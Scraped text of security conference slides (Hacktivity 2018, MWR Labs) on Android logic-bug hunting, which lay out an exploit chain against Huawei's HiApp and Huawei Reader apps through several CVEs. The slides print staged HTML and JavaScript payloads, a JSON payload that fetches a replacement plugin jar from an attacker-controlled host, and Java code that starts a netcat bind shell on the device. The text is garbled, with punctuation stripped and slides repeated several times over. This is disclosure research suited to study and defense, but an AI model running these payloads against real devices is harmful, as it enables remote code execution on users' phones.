HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 10: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/10.jpg)
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 11: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/11.jpg)
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 12: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/12.jpg)
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
